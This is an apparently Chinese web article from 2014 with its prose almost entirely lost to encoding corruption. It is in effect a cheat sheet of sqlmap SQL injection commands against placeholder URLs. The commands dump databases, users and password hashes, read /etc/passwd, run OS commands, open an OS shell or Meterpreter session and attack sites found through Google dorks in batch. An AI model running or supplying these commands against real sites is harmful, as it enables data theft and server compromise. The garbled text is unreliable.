????????SQL???

???????????? ???????[ 2014/6/17 14:04:11 ] ????????SQL??? ??????????

???????????
????sqlmap????Python???????????????
????http://yunpan.cn/QiCBLZtGGTa7U ???????? c26e
???????????
???????Python????sqlmap?????Python?????￡?
????????????
????С?????????sqlmap?汾??
????python sqlmap/sqlmap.py -h
???????????
???????SQL?????蹤???????????????????SQL????????URL??
??????? ????? ??~~ ??oo??
???????崠??
????1.???????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --current-user #?????????????

python sqlmap/sqlmap.py -u "http://www.xxoo.com/news?id=1" --current-db #???????????????

python sqlmap/sqlmap.py -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" #?б???

python sqlmap/sqlmap.py -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #?????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 #??????????

????2.???????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --smart --level 3 --users # smart???? level ??????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbms "Mysql" --users # dbms ????????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --users #??????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbs#???????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --passwords #????????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --passwords-U root -v 0 #?г????????????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --dump -C "password??user??id" -T "tablename" -D "db_name" --start 1 --stop 20 #?г??????Σ??г?20??

python sqlmap/sqlmap.py -u "http://url/news?id=1" --dump-all -v 0 #?г?????????????б?

python sqlmap/sqlmap.py -u "http://url/news?id=1" --privileges #?????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --privileges -U root #???????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --is-dba -v 1 #??????????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --roles #??????????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --udf-inject #???????????庯???????????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 #?г?????????б?

python sqlmap/sqlmap.py -u "http://url/news?id=1" --union-cols #union ???????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --cookie "COOKIE_VALUE" #cookie???

python sqlmap/sqlmap.py -u "http://url/news?id=1" -b #???banner???

python sqlmap/sqlmap.py -u "http://url/news?id=1" --data "id=3" #post???

python sqlmap/sqlmap.py -u "http://url/news?id=1" -v 1 -f #????б??????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --proxy"http://127.0.0.1:8118" #???????

python sqlmap/sqlmap.py -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE" #????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --sql-shell #??????sql????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --file /etc/passwd

python sqlmap/sqlmap.py -u "http://url/news?id=1" --os-cmd=whoami #?????????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --os-shell #??????shell

python sqlmap/sqlmap.py -u "http://url/news?id=1" --os-pwn #????shell

python sqlmap/sqlmap.py -u "http://url/news?id=1" --reg-read #???win??????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbs-o "sqlmap.log" #???????

python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume #???????????sqlmap -g "google??" --dump-all --batch #google??????????? ?????????ι??????

python sqlmap/sqlmap.py -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password

???????????????????????漰???????????????????SPASVOС??(021-61079698-8054)?????????????????????????